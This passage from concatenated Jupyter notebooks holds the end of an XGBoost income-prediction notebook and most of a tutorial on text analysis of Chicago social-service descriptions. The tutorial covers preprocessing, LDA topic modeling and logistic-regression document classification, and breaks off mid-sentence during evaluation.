y_val = val[target]
X_val = val.drop(target,axis=1)

y_test = test[target]
X_test = test.drop(target,axis=1)
###Output
_____no_output_____
###Markdown
Establishing the Baseline
###Code
print('Baseline Accuracy:', y_train.value_counts(normalize=True).max())
###Output
Baseline Accuracy: 0.6679406244668146
###Markdown
Building the Model
###Code
#Starting with a pipeline. Using OrdinalEncoder for the object columns; we do not need an Imputer since the NaNs were all filled with top values, and I am working with XGBClassifier.
modelxgb = make_pipeline(
    OrdinalEncoder(),
    XGBClassifier(n_jobs=-1)
)

modelxgb.fit(X_train,y_train)
print('Training accuracy:', modelxgb.score(X_train, y_train))
print('Validation accuracy:', modelxgb.score(X_val, y_val))
modelxgb.fit(X_train, y_train)
# make predictions for test data
y_pred = modelxgb.predict(X_test)
# evaluate predictions
from sklearn.metrics import accuracy_score
accuracy = accuracy_score(y_test, y_pred)
print("Accuracy: %.2f%%" % (accuracy * 100.0))
%matplotlib inline
import seaborn as sns
sns.distplot(y_train);
from joblib import dump
dump(modelxgb, 'Pipeline.joblib2', compress=True)
###Output
_____no_output_____
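###Markdown
Earlier I wondered how to wrap the three def/if/else helpers into a single wrangle function. Here is a minimal sketch (my own consolidation, not part of the pipeline above; it would replace the three `apply` calls and the drop, so it has to run on the raw dataframe before those cells):
###Code
def wrangle(df):
    # vectorized versions of over50K, over40 and gender; astype(int) turns the booleans into 0/1
    df = df.copy()
    df['makes-50K+'] = (df['income'] == '>50K').astype(int)
    df['over40hrs+'] = (df['hours-per-week'] > 40).astype(int)
    df['gender-F/1-M/0'] = (df['sex'] == 'Female').astype(int)
    return df.drop(columns=['fnlwgt','income','hours-per-week','sex','capital-gain','capital-loss'])
###Output
_____no_output_____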
curriculum/2_data_exploration_and_analysis/text-analysis/text_analysis_social_services.ipynb
###Markdown
Text Analysis
---
Introduction
**Text analysis** is used to extract useful information from or summarize a large amount of unstructured text stored in documents. This opens up the opportunity of using text data alongside more conventional data sources (e.g. surveys and administrative data). The goal of text analysis is to take a large corpus of complex and unstructured text data and extract important and meaningful messages in a comprehensible way.

Text analysis can help with the following tasks:

* **Information Retrieval**: Find relevant information in a large database, such as a systematic literature review, that would be very time-consuming for humans to do manually.

* **Clustering and Text Categorization**: Summarize a large corpus of text by finding the most important phrases, using methods like topic modeling.

* **Text Summarization**: Create category-sensitive text summaries of a large corpus of text.

* **Machine Translation**: Translate documents from one language to another.

In this tutorial, we are going to analyze social services descriptions using topic modeling to examine the content of our data, and document classification to tag the type of facility each website describes.

Learning Outcomes
In this tutorial, you will...
* Learn how to transform a corpus of text into a structured matrix format so that we can apply natural language processing (NLP) methods
* Learn the basics and applications of topic modeling
* Learn how to do document tagging and evaluate the results

Glossary of Terms
* **Corpus**: A corpus is the set of all text documents used in your analysis; for example, your corpus of text may include hundreds of research articles.
* **Tokenize**: Tokenization is the process by which text is separated into meaningful terms or phrases. In English this is easy to do for individual words, as they are separated by whitespace; however, it can get more complicated to automate determining which groups of words constitute meaningful phrases.
* **Stemming**: Stemming is normalizing text by reducing all forms or conjugations of a word to the word's most basic form. In English, this can mean making a rule of removing the suffixes "ed" or "ing" from the end of all words, but it gets more complex. For example, "to go" is irregular, so you need to tell the algorithm that "went" and "goes" stem from a common lemma, and should be considered alternate forms of the word "go."
* **TF-IDF**: TF-IDF (term frequency-inverse document frequency) is an example of feature engineering where the most important words are extracted by taking into account their frequency in documents and in the entire corpus of documents as a whole.
* **Topic Modeling**: Topic modeling is an unsupervised learning method where groups of words that often appear together are clustered into topics. Typically, the words in one topic should be related and make sense (e.g. boat, ship, captain). Individual documents can fall under one topic or multiple topics.
* **LDA**: LDA (Latent Dirichlet Allocation) is a type of probabilistic model commonly used for topic modeling.
* **Stop Words**: Stop words are words that have little semantic meaning but occur very frequently, like prepositions, articles and common nouns. For example, every document (in English) will probably contain the words "and" and "the" many times. You will often remove them as part of preprocessing using a list of stop words.
###Code
%pylab inline
import nltk
import ujson
import re
import time
import progressbar

import pandas as pd
from __future__ import print_function
from six.moves import zip, range
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.decomposition import LatentDirichletAllocation
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import precision_recall_curve, roc_auc_score, auc
from sklearn import preprocessing
from collections import Counter, OrderedDict
from nltk.corpus import stopwords
from nltk import SnowballStemmer
#nltk.download('stopwords') #download the latest stopwords
###Output
_____no_output_____
###Markdown
Load the Data
Our dataset for this tutorial is a set of descriptions of social services in Chicago; details on the data and how the subset we're using was created can be found in the `data` folder for this tutorial.
###Code
df_socialservices_data = pd.read_csv('./data/socialservices.csv')
###Output
_____no_output_____
###Markdown
Explore the Data
###Code
df_socialservices_data.head()
###Output
_____no_output_____
###Markdown
Our table has 7 fields: `FACID`, `facname`, `factype`, `facurl`, `facloc`, `abouturl`, and `textfromurl`. How many facilities and types of facilities are in this dataset?
###Code
df_socialservices_data.factype.unique()
df_socialservices_data.facname.unique()
df_socialservices_data.facname.unique().shape
###Output
_____no_output_____
###Markdown
There are 48 facilities, categorized into 4 unique facility types: education, income, health, and safety net.

Topic Modeling
We are going to apply topic modeling, an unsupervised learning method, to our corpus to find the high-level topics in our corpus as a "first go" for exploring our data. Through this process, we'll discuss how to clean and preprocess our data to get the best results.

Topic modeling is a broad subfield of machine learning and natural language processing. We are going to focus on a common modeling approach called Latent Dirichlet Allocation (LDA).

To use topic modeling, we first have to assume that topics exist in our corpus, and that some small number of these topics can "explain" the corpus. A topic in this context is a list of words from the corpus, ranked by probability. A single document can be explained by multiple topics. For instance, an article on net neutrality would fall under the topic "technology" as well as the topic "politics." The set of topics used by a document is known as the document's allocation; hence the name Latent Dirichlet Allocation: each document has an allocation of latent topics drawn from a Dirichlet distribution.

Processing Text Data
The first important step in working with text data is cleaning and processing the data, which includes (but is not limited to) *forming a corpus of text, tokenization, removing stop-words, finding words co-located together (N-grams), and stemming and lemmatization*. Each of these steps will be discussed below.

The ultimate goal is to transform our text data into a form an algorithm can work with, because a document or a corpus of text cannot be fed directly into an algorithm. Algorithms expect numerical feature vectors with certain fixed sizes, and can't handle documents, which are basically sequences of symbols with variable length. We will be transforming our text corpus into a *bag of n-grams* to be further analyzed.
In this form our text data is represented as a matrix where each row refers to a specific document and each column is the occurrence of a word (feature).

Bag of N-gram Representation Example
Ultimately, we want to take our collection of documents (the corpus) and convert it into a matrix. Fortunately, `sklearn` has a pre-built object, `CountVectorizer`, that can tokenize, eliminate stopwords, identify n-grams, and stem our corpus, and output a matrix in one step. Before we apply the vectorizer to our corpus of data, let's apply it to a toy example so that we see what the output looks like and how a bag of words is represented.
###Code
def create_bag_of_words(corpus,
                        NGRAM_RANGE=(0,1),
                        stop_words = None,
                        stem = False,
                        MIN_DF = 0.05,
                        MAX_DF = 0.95,
                        USE_IDF=False):
    """
    Turn a corpus of text into a bag-of-words.

    Parameters
    -----------
    corpus: ls
        list of documents in corpus
    NGRAM_RANGE: tuple
        range of N-gram. Default (0,1)
    stop_words: ls
        list of commonly occurring words that have little semantic value
    stem: bool
        use a stemmer to stem words
    MIN_DF: float
        exclude words that have a frequency less than the threshold
    MAX_DF: float
        exclude words that have a frequency greater than the threshold

    Returns
    -------
    bag_of_words: scipy sparse matrix
        scipy sparse matrix of text
    features:
        ls of words
    """
    #parameters for vectorizer
    ANALYZER = "word" #unit of features are single words rather than phrases of words
    STRIP_ACCENTS = 'unicode'
    stemmer = nltk.SnowballStemmer("english")
    if stem:
        tokenize = lambda x: [stemmer.stem(i) for i in x.split()]
    else:
        tokenize = None
    vectorizer = CountVectorizer(analyzer=ANALYZER,
                                 tokenizer=tokenize,
                                 ngram_range=NGRAM_RANGE,
                                 stop_words = stop_words,
                                 strip_accents=STRIP_ACCENTS,
                                 min_df = MIN_DF,
                                 max_df = MAX_DF)

    bag_of_words = vectorizer.fit_transform( corpus ) #transform our corpus into a bag of words
    features = vectorizer.get_feature_names()

    if USE_IDF:
        NORM = None #normalization flag; None disables normalization
        SMOOTH_IDF = True #prevents division by zero errors
        SUBLINEAR_IDF = True #replace TF with 1 + log(TF)
        transformer = TfidfTransformer(norm = NORM,smooth_idf = SMOOTH_IDF,sublinear_tf = True)
        #get the bag-of-words from the vectorizer and
        #then use TFIDF to limit the tokens found throughout the text
        tfidf = transformer.fit_transform(bag_of_words)

        return tfidf, features
    else:
        return bag_of_words, features
toy_corpus = ['this is document one', 'this is document two', 'text analysis on documents is fun']
toy_bag_of_words, toy_features = create_bag_of_words(toy_corpus)
toy_corpus
toy_features
np_bag_of_words = toy_bag_of_words.toarray()
np_bag_of_words
###Output
_____no_output_____
###Markdown
Our data has been transformed from a document into a 3 x 9 matrix, where each row in the matrix corresponds to a document, and each column corresponds to a feature (in the order they appear in `toy_features`). A 1 indicates the existence of the feature or word in the document, and a 0 indicates the word is not present.

It is very common that this representation will be a "sparse" matrix, or a matrix that has a lot of 0s. With sparse matrices, it is often more efficient to keep track of which values *aren't* 0 and where those non-zero entries are located, rather than to save the entire matrix. To save space, the `scipy` library has special ways of storing sparse matrices in an efficient way.

Our toy corpus is now ready to be analyzed. We used this toy example to illustrate how a document is turned into a matrix to be used in text analysis.
When you're applying this to real text data, the matrix will be much larger and harder to interpret, but it's important that you know the process.

---
Exercise 1
To check your knowledge, make your own toy corpus and turn it into a matrix.
###Code
#solution
exercise_corpus = ['Batman is friends with Superman',
                   'Superman is enemies with Lex Luthor',
                   'Batman is enemies with Lex Luthor']
exercise_bag_of_words, exercise_features = create_bag_of_words(exercise_corpus)
np_bag_of_words = exercise_bag_of_words.toarray()
exercise_features
np_bag_of_words
###Output
_____no_output_____
###Markdown
---
Word Counts
As an initial look into the data, we can examine the most frequently occurring words in our corpus. We can sum the columns of the bag_of_words and then convert to a numpy array. From here we can zip the features and word_count into a dictionary, and display the results.
###Code
def get_word_counts(bag_of_words, feature_names):
    """
    Get the ordered word counts from a bag_of_words

    Parameters
    ----------
    bag_of_words: obj
        scipy sparse matrix from CountVectorizer
    feature_names: ls
        list of words

    Returns
    -------
    word_counts: dict
        Dictionary of word counts
    """
    np_bag_of_words = bag_of_words.toarray()
    word_count = np.sum(np_bag_of_words,axis=0)
    np_word_count = np.asarray(word_count).ravel()
    dict_word_counts = dict( zip(feature_names, np_word_count) )

    orddict_word_counts = OrderedDict(
                                    sorted(dict_word_counts.items(), key=lambda x: x[1], reverse=True), )

    return orddict_word_counts
get_word_counts(toy_bag_of_words, toy_features)
###Output
_____no_output_____
###Markdown
Note that the words "document" and "documents" both appear separately in the list. Should they be treated as the same words, since one is just the plural of the other, or should they be considered distinct words? These are the types of decisions you will have to make in your preprocessing steps.

---
Exercise 2
Get the word counts of your exercise corpus.
###Code
get_word_counts(exercise_bag_of_words, exercise_features)
###Output
_____no_output_____
###Markdown
Text Corpora
First we need to form our corpus, or the set of all descriptions from all websites. We can pull out the array of descriptions from the data frame using the data frame's `.values` attribute.
###Code
corpus = df_socialservices_data['textfromurl'].values #pull all the descriptions and put them in a numpy array
corpus
def create_topics(tfidf, features, N_TOPICS=3, N_TOP_WORDS=5,):
    """
    Given a matrix of features of text data generate topics

    Parameters
    -----------
    tfidf: scipy sparse matrix
        sparse matrix of text features
    N_TOPICS: int
        number of topics (default 3)
    N_TOP_WORDS: int
        number of top words to display in each topic (default 5)

    Returns
    -------
    ls_keywords: ls
        list of keywords for each topic
    doctopic: array
        numpy array with the percentage of each topic for each document
""" with progressbar.ProgressBar(max_value=progressbar.UnknownLength) as bar: i=0 lda = LatentDirichletAllocation( n_topics= N_TOPICS, learning_method='online') #create an object that will create 5 topics bar.update(i) i+=1 doctopic = lda.fit_transform( tfidf ) bar.update(i) i+=1 ls_keywords = [] for i,topic in enumerate(lda.components_): word_idx = np.argsort(topic)[::-1][:N_TOP_WORDS] keywords = ', '.join( features[i] for i in word_idx) ls_keywords.append(keywords) print(i, keywords) bar.update(i) i+=1 return ls_keywords, doctopic corpus_bag_of_words, corpus_features = create_bag_of_words(corpus) ###Output _____no_output_____ ###Markdown Let's examine our features. ###Code corpus_features ###Output _____no_output_____ ###Markdown The first aspect to notice about the feature list is that the first few entries are numbers that have no real semantic meaning. The feature lists also includes numerous other useless words, such as prepositions and articles, that will just add noise to our analysis. We can also notice the words *action* and *activities*, or the words *addition* and *additional*, are close enough to each other that it might not make sense to treat them as entirely separate words. Part of your cleaning and preprocessing duties will be manually inspecting your lists of features, seeing where these issues arise, and making decisions to either remove them from your analysis or address them separately. Let's get the count of the number of times that each of the words appears in our corpus. ###Code get_word_counts(corpus_bag_of_words, corpus_features) ###Output _____no_output_____ ###Markdown Our top words are articles, prepositions and conjunctions that are not informative whatsoever, so we're probably not going to come up with anything interesting ("garbage in, garbage out"). Nevertheless, let's forge blindly ahead and try to create topics, and see the quality of the results that we get. ###Code ls_corpus_keywords, corpus_doctopic = create_topics(corpus_bag_of_words, corpus_features) ###Output _____no_output_____ ###Markdown These topics don't give us any real insight to what the data contains - one of the topics is "and, the, to, of, in"! There are some hints to the subjects of the websites ("YWCA", "youth") and their locations ("Evanston"), but the signal is being swamped by the noise. The word "click" also comes up. This word might be useful in some contexts, but since we scraped this data from websites, it's likely that "click" is more related to the website itself (e.g. "Click here to find out more") as opposed to the content of the website. We'll have to clean and process our data to get any meaningful information out of this text. Text Cleaning and NormalizationTo clean and normalize text, we'll remove all special characters, numbers, and punctuation, so we're left with only the words themselves. Then we will make all the text lowercase; this uniformity will ensure that the algorithm doesn't treat "the" and "The" as different words, for example. To remove the special characters, numbers and punctuation we will use regular expressions. **Regular Expressions**, or "regexes" for short, let you find all the words or phrases in a document or text file that match a certain pattern. These rules are useful for pulling out useful information from a large amount of text. 
For example, if you want to find all email addresses in a document, you might look for everything that looks like *some combination of letters, _, .* followed by *@*, followed by more letters, and ending in *.com* or *.edu*. If you want to find all the credit card numbers in a document, you might look for everywhere you see the pattern "four numbers, space, four numbers, space, four numbers, space, four numbers." Regexes are also helpful if you are scraping information from websites, because you can use them to separate the content from the HTML code used for formatting the website.

A full tutorial on regular expressions would be outside the scope of this tutorial, but many good tutorials can be found online. [regex101.com](regex101.com) is also a great interactive tool for developing and checking regular expressions.

>"Some people, when confronted with a problem, think
>'I know, I'll use regular expressions.' Now they have two problems."
> -- Jamie Zawinski

*A word of warning:* Regexes can work much more quickly than plain text sorting; however, if your regular expressions are becoming overly complicated, it's a good idea to find a simpler way to do what you want to do. Any developer should keep in mind there is a trade-off between optimization and understandability. The general philosophy of programming in Python is that your code is meant to be as understandable by *people* as much as possible, because human time is more valuable than computer time. You should therefore lean toward understandability rather than overly optimizing your code to make it run as quickly as possible. Your future-self, code-reviewers, people who inherit your code, and anyone else who has to make sense of your code in the future will appreciate it.

For our purposes, we are going to use a regular expression to match all characters that are not letters -- punctuation, quotes, special characters and numbers -- and replace them with spaces. Then we'll make all of the remaining characters lowercase. We will be using the `re` library in python for regular expression matching.
###Code
#get rid of the punctuation and set all characters to lowercase
RE_PREPROCESS = r'\W+|\d+' #the regular expression that matches runs of non-word characters or digits

#get rid of punctuation and make everything lowercase
#the code below works by looping through the array of text ("corpus")
#for a given piece of text ("comment") we invoke the `re.sub` command
#the `re.sub` command takes 3 arguments: (1) the regular expression to match,
#(2) what we want to substitute in place of that matching string (' ', a space)
#and (3) the text we want to apply this to.
#we then invoke the `lower()` method on the output of the `re.sub` command
#to make all the remaining characters lowercase.
#the result is a list, where each entry in the list is a cleaned version of the
#corresponding entry in the original corpus.
#we then make the list into a numpy array to use it in analysis
processed_corpus = np.array( [ re.sub(RE_PREPROCESS, ' ', comment).lower() for comment in corpus] )
###Output
_____no_output_____
###Markdown
First Description, Before Cleaning
###Code
corpus[0]
###Output
_____no_output_____
###Markdown
This text includes a lot of useful information, but also includes some things we don't want or need. There are some weird special characters (like `\xe2\x80\x94`).
There are also some numbers, which are informative and interesting to a human reading the text (phone numbers, addresses, "since 1899," "impacts the lives of nearly 20,000 children"), but when we break down the documents into individual words, the numbers will become meaningless. We'll also want to remove all punctuation, so that we can say any two things separated by a space are individual words.

First Description, After Cleaning
###Code
processed_corpus[0]
###Output
_____no_output_____
###Markdown
All lowercase, all numbers and special characters have been removed. Our text is now normalized.

Tokenization
Now that we've cleaned our text, we can *tokenize* it by deciding which words or phrases are the most meaningful. In this case, we'll want to split our text into individual words. Normally the `CountVectorizer` handles this for us.

To go from a whole document to a list of individual words, we can use the `.split()` command. By default, this command splits based on spaces in between words, so we don't need to specify that explicitly.
###Code
tokens = processed_corpus[0].split()
tokens
###Output
_____no_output_____
###Markdown
Stopwords
Stopwords are words that are found commonly throughout a text and carry little semantic meaning. Examples of common stopwords are prepositions, articles and common nouns. For example, the words *the* and *of* are totally ubiquitous, so they won't serve as meaningful features, whether to distinguish documents from each other or to tell what a given document is about. You may also run into words that you want to remove based on where you obtained your corpus of text or what it's about. There are many lists of common stopwords available for you to use, both for general documents and for specific contexts, so you don't have to start from scratch.

We can eliminate stopwords by checking all the words in our corpus against a list of commonly occurring stopwords.
###Code
eng_stopwords = stopwords.words('english')
eng_stopwords
#sample of stopwords
#this is an example of slicing where we implicitly start at the beginning and move to the end
#we select every 10th entry in the array
eng_stopwords[::10]
###Output
_____no_output_____
###Markdown
Notice that this list includes "weren" and "hasn" as well as single letters ("t"). Why do you think these are contained in the list of stopwords?

---
Exercise 3
Try slicing every 5th word.
###Code
eng_stopwords[::5]
###Output
_____no_output_____
###Markdown
---
Topic Modeling on Cleaned Data
Now that we've cleaned up our data a little bit, let's see what our bag of words looks like.
###Code
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus, stop_words=eng_stopwords)
dict_processed_word_counts = get_word_counts(processed_bag_of_words, processed_features)
dict_processed_word_counts
###Output
_____no_output_____
###Markdown
Much better! Now this is starting to look like a reasonable representation of our corpus of text.

We mentioned that, in addition to stopwords that are common across all types of text analysis problems, there will also be specific stopwords based on the context of your domain. Notice how the top words include words like "services," "youth," "community," "mission"? It makes sense that these words are so common, but we'd expect to see them in every website in our corpus - after all, we're looking at websites of social service organizations in Chicago! - so they won't be very helpful in analysis.
One quick way to remove some of these domain-specific stopwords is by dropping some of your most frequent words. We'll start out by dropping the top 20. You'll want to change this number, playing with making it bigger and smaller, to see how it affects your resulting topics.
###Code
top_20_words = list(dict_processed_word_counts.keys())[:20]
domain_specific_stopwords = eng_stopwords + top_20_words
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus, stop_words=domain_specific_stopwords)
dict_processed_word_counts = get_word_counts(processed_bag_of_words, processed_features)
dict_processed_word_counts
###Output
_____no_output_____
###Markdown
This is a bit better - although we still see some words that are probably very common ("care", "communities"), words like "catholic," "north," and "violence" will probably help us come up with more specific categories within the broader realm of social services. Let's see what topics we produce.
###Code
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words, processed_features)
###Output
_____no_output_____
###Markdown
Now we are starting to get somewhere! We can manipulate the number of topics we want to find and the number of words to use for each topic to see if we can understand more from our corpus.
###Code
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 5, N_TOP_WORDS= 10)
###Output
_____no_output_____
###Markdown
Some structure is starting to reveal itself - "legal" and "law" appear in the same topic, as do "violence," "domestic," and "women" (probably appearing in websites of women's shelters). Adding more topics has revealed larger subtopics. Let's see if increasing the number of topics gives us more information.

However, we can see that "donatebutton" and "companylogo" are still present - these are more likely artifacts of the websites than useful information about the charities! This is an iterative process - after seeing the results of some analysis, you will need to go back to the preprocessing step and add more words to your list of stopwords or change how you cleaned the data.
###Code
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 10, N_TOP_WORDS= 15)
###Output
_____no_output_____
###Markdown
This looks like a good amount of topics for now. Some of the top words are quite similar, like "volunteer" and "volunteers," or "child" and "children." Let's move to stemming and lemmatization.

Stemming and Lemmatization
We can further process our text through *stemming and lemmatization*, or replacing words with their root or simplest form. For example "systems," "systematic," and "system" are all different words, but we can replace all these words with "system" without sacrificing much meaning.

A **lemma** is the original dictionary form of a word (e.g. the lemma for "lies," "lied," and "lying" is "lie"). The process of turning a word into its simplest form is **stemming**. There are several well-known stemming algorithms -- Porter, Snowball, Lancaster -- that all have their respective strengths and weaknesses. For this tutorial, we'll use the Snowball stemmer, which is what the code below actually calls.
###Code
stemmer = SnowballStemmer("english")
print(stemmer.stem('lies'))
print(stemmer.stem("lying"))
print(stemmer.stem('systematic'))
print(stemmer.stem("running"))
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus,
                                                                 stop_words=domain_specific_stopwords,
                                                                 stem=True) #stem the corpus this time, since this section is about stemming
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 10, N_TOP_WORDS= 15)
###Output
_____no_output_____
###Markdown
N-grams
Obviously, reducing a document to a bag of words means losing much of its meaning - we put words in certain orders, and group words together in phrases and sentences, precisely to give them more meaning. If you follow the processing steps we've gone through so far, splitting your document into individual words and then removing stopwords, you'll completely lose all phrases like "kick the bucket," "commander in chief," or "sleeps with the fishes."

One way to address this is to break down each document similarly, but rather than treating each word as an individual unit, treat each group of 2 words, or 3 words, or *n* words, as a unit. We call this a "bag of *n*-grams," where *n* is the number of words in each chunk. Then you can analyze which groups of words commonly occur together (in a fixed order).

Let's transform our corpus into a bag of n-grams with *n*=2: a bag of 2-grams, AKA a bag of bi-grams.
###Code
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus,
                                                                 stop_words=domain_specific_stopwords,
                                                                 stem=True,
                                                                 NGRAM_RANGE=(0,2))
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 10, N_TOP_WORDS= 15)
###Output
_____no_output_____
###Markdown
We can see that this lets us uncover patterns that we couldn't when we just used a bag of words: "north shore" and "domest violenc" come up as words. Note that this still includes the individual words, as well as the bi-grams.

TF-IDF (Term Frequency-Inverse Document Frequency)
A final step in cleaning and processing our text data is **Term Frequency-Inverse Document Frequency (TF-IDF)**. TF-IDF is based on the idea that the words (or terms) most related to a certain topic will occur frequently in documents on that topic, and infrequently in others. TF-IDF reweights words so that we capture the words that are unique to a document and suppress the words that are common throughout the corpus, by inversely weighting each word by the frequency with which it appears across the corpus.
###Code
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus,
                                                                 stop_words=domain_specific_stopwords,
                                                                 stem=True,
                                                                 NGRAM_RANGE=(0,2),
                                                                 USE_IDF = True)
dict_word_counts = get_word_counts(processed_bag_of_words, processed_features)
dict_word_counts
###Output
_____no_output_____
###Markdown
The word counts have been reweighted to emphasize the more meaningful words of the corpus, while de-emphasizing the words that are found commonly throughout the corpus.
###Code
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 10, N_TOP_WORDS= 15)
###Output
_____no_output_____
###Markdown
---
Exercise 4
You can only develop an intuition for the right number of topics and topic words suitable for a given problem by iterating until you find a good match. Change the number of topics and topic words until you get an intuition of how many words and topics are enough.
###Code
exercise_keywords, exercise_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 5, N_TOP_WORDS= 25)
exercise_keywords, exercise_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 10, N_TOP_WORDS= 25)
###Output
_____no_output_____
###Markdown
---
###Code
#grab the topic_id of the majority topic for each document and store it in a list
ls_topic_id = [np.argsort(processed_doctopic[comment_id])[::-1][0] for comment_id in range(len(corpus))]
df_socialservices_data['topic_id'] = ls_topic_id #add to the dataframe so we can compare with the facility types
###Output
_____no_output_____
###Markdown
Now that each row is tagged with a topic ID, let's see how well the topics explain the social services by looking at the first topic, and seeing how similar the social services within that topic are to each other.
###Code
topic_num = 0
print(processed_keywords[topic_num])
df_socialservices_data[ df_socialservices_data.topic_id == topic_num ].head(10)
###Output
_____no_output_____
###Markdown
---
Exercise 5
Examine the other topic IDs, and see if the "topics" we identified make sense as groupings of social service agencies.
###Code
topic_num = 3
print(processed_keywords[topic_num])
df_socialservices_data[ df_socialservices_data.topic_id == topic_num ].head(10)
###Output
_____no_output_____
###Markdown
---
Supervised Learning: Document Classification
Previously, we used topic modeling to infer relationships between social service facilities within the data. That is an example of unsupervised learning: we were looking to uncover structure in the form of topics, or groups of agencies, but we did not necessarily know the ground truth of how many groups we should find or which agencies belonged in which group.

Now we turn our attention to supervised learning. In supervised learning, we have a *known* outcome or label (*Y*) that we want to produce given some data (*X*), and in general, we want to be able to produce this *Y* when we *don't* know it, or when we *only* have *X*.

In order to produce labels we need to first have examples our algorithm can learn from, a "training set." In the context of text analysis, developing a training set can be very expensive, as it can require a large amount of human labor or linguistic expertise. **Document classification** is an example of supervised learning in which we want to characterize our documents based on their contents (*X*). A common example of document classification is spam e-mail detection. Another example of supervised learning in text analysis is *sentiment analysis*, where *X* is our documents and *Y* is the state of the author. This "state" is dependent on the question you're trying to answer, and can range from the author being happy or unhappy with a product to the author being politically conservative or liberal. Another example is *part-of-speech tagging* where *X* are individual words and *Y* is the part-of-speech.

In this section, we'll train a classifier to classify social service agencies. Let's see if we can label a new website as belonging to facility type "income" or "health."
Load the Data
###Code
df_socialservices_data.factype.value_counts()
mask = df_socialservices_data.factype.isin(['income','health'])
df_income_health = df_socialservices_data[mask]
df_train, df_test = train_test_split(df_income_health, test_size=0.20, random_state=17)
df_train.head()
df_train['factype'].unique()
Counter(df_train['factype'].values)
df_test.head()
df_test['factype'].unique()
Counter(df_test['factype'].values)
###Output
_____no_output_____
###Markdown
Process Data
In order to feed our data into a classifier, we need to pull out the labels (*Y*) and a clean corpus of documents (*X*) for our training and testing sets.
###Code
train_labels = df_train.factype.values
train_corpus = np.array( [re.sub(RE_PREPROCESS, ' ', text).lower() for text in df_train.textfromurl.values])
test_labels = df_test.factype.values
test_corpus = np.array( [re.sub(RE_PREPROCESS, ' ', text).lower() for text in df_test.textfromurl.values])
labels = np.append(train_labels, test_labels)
###Output
_____no_output_____
###Markdown
Just as we had done in the unsupervised learning context, we have to transform our data. This time we have to transform our testing and training set into two different bags of words. The classifier will learn from the training set, and we will evaluate the classifier's performance on the testing set.
###Code
#parameters for vectorizer
ANALYZER = "word" #unit of features are single words rather than phrases of words
STRIP_ACCENTS = 'unicode'
TOKENIZER = None
NGRAM_RANGE = (0,2) #Range for phrases of words
MIN_DF = 0.01 # Exclude words that have a frequency less than the threshold
MAX_DF = 0.8  # Exclude words that have a frequency greater than the threshold

vectorizer = CountVectorizer(analyzer=ANALYZER,
                             tokenizer=None, # alternatively tokenize_and_stem but it will be slower
                             ngram_range=NGRAM_RANGE,
                             stop_words = stopwords.words('english'),
                             strip_accents=STRIP_ACCENTS,
                             min_df = MIN_DF,
                             max_df = MAX_DF)

NORM = None #normalization flag; None disables normalization
SMOOTH_IDF = True #prevents division by zero errors
SUBLINEAR_IDF = True #replace TF with 1 + log(TF)
USE_IDF = True #flag to control whether to use TFIDF

transformer = TfidfTransformer(norm = NORM,smooth_idf = SMOOTH_IDF,sublinear_tf = True)

#get the bag-of-words from the vectorizer and
#then use TFIDF to limit the tokens found throughout the text
start_time = time.time()
train_bag_of_words = vectorizer.fit_transform( train_corpus ) #fit the vectorizer on the training corpus only, so the test set doesn't leak into the features
test_bag_of_words = vectorizer.transform( test_corpus )
if USE_IDF:
    train_tfidf = transformer.fit_transform(train_bag_of_words)
    test_tfidf = transformer.transform(test_bag_of_words)
features = vectorizer.get_feature_names()
print('Time Elapsed: {0:.2f}s'.format(
        time.time()-start_time))
###Output
_____no_output_____
###Markdown
We cannot pass the labels "income" or "health" directly to the classifier. Instead, we need to encode them as 0s and 1s using the `labelencoder` part of `sklearn`.
###Code
#relabel our labels as a 0 or 1
le = preprocessing.LabelEncoder()
le.fit(labels)
labels_binary = le.transform(labels)
list(zip(labels,labels_binary))
###Output
_____no_output_____
###Markdown
We also need to create arrays of indices so we can access the training and testing sets accordingly.
###Code train_size = df_train.shape[0] train_set_idx = np.arange(0,train_size) test_set_idx = np.arange(train_size, len(labels)) train_labels_binary = labels_binary[train_set_idx] test_labels_binary = labels_binary[test_set_idx] ###Output _____no_output_____ ###Markdown The classifier we are using in the example is LogisticRegression. As we saw in the Machine Learning tutorial, first we decide on a classifier, then we fit the classifier to the data to create a model. We can then test our model on the test set by passing the features (*X*) from our test set to get predicted labels. The model will output the probability of each document being classified as income or health. ###Code clf = LogisticRegression(penalty='l1', solver='liblinear') #the liblinear solver supports the l1 penalty mdl = clf.fit(train_tfidf, labels_binary[train_set_idx]) #train the classifier to get the model y_score = mdl.predict_proba( test_tfidf ) #score of the document referring to an income or health agency ###Output _____no_output_____ ###Markdown Evaluation ###Code def plot_precision_recall_n(y_true, y_prob, model_name): """ y_true: ls ls of ground truth labels y_prob: ls ls of predict_proba output from model model_name: str str of model name (e.g., LR_123) """ from sklearn.metrics import precision_recall_curve y_score = y_prob precision_curve, recall_curve, pr_thresholds = precision_recall_curve(y_true, y_score) precision_curve = precision_curve[:-1] recall_curve = recall_curve[:-1] pct_above_per_thresh = [] number_scored = len(y_score) for value in pr_thresholds: num_above_thresh = len(y_score[y_score>=value]) pct_above_thresh = num_above_thresh / float(number_scored) pct_above_per_thresh.append(pct_above_thresh) pct_above_per_thresh = np.array(pct_above_per_thresh) plt.clf() fig, ax1 = plt.subplots() ax1.plot(pct_above_per_thresh, precision_curve, 'b') ax1.set_xlabel('percent of population') ax1.set_ylabel('precision', color='b') ax1.set_ylim(0,1.05) ax2 = ax1.twinx() ax2.plot(pct_above_per_thresh, recall_curve, 'r') ax2.set_ylabel('recall', color='r') ax2.set_ylim(0,1.05) name = model_name plt.title(name) plt.show() plot_precision_recall_n(labels_binary[test_set_idx], y_score[:,1], 'LR') ###Output _____no_output_____ ###Markdown If we examine our precision-recall curve we can see that our precision is 1 up to 40 percent of the population. We can use a "precision at *k*" 